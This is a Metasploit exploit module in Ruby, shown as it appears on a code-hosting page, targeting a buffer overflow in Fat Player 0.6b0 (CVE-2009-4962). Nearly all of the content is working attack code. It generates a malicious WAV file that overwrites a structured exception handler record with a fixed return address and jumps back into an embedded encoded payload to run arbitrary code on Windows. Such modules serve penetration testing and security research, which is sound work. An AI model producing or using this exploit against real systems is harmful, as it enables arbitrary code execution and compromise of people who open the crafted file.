rapid7/metasploit-framework

View on GitHub
modules/exploits/windows/fileformat/fatplayer_wav.rb

Summary

Maintainability
A
0 mins
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Fat Player Media Player 0.6b0 Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Fat Player 0.6b. When
        the application is used to import a specially crafted wav file, a buffer overflow occurs
        allowing arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Fitts <fitts.james[at]gmail.com>',         # Original Exploit
          'dookie',        # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2009-4962'],
          [ 'OSVDB', '57343'],
          [ 'EDB', '15279' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a",
          'StackAdjustment' => -3500
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => 0x0046bee3 } ],    # p/p/r in FatPlayer.exe
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-10-18',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
      ])

  end

  def exploit

    sploit = rand_text_alpha_upper(100)
    sploit << make_nops(100)
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(3932 - (payload.encoded.length))
    sploit << generate_seh_record(target.ret)
    sploit << "\xe9\x60\xf0\xff\xff"    # Jump back 4000 bytes

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(sploit)

  end
end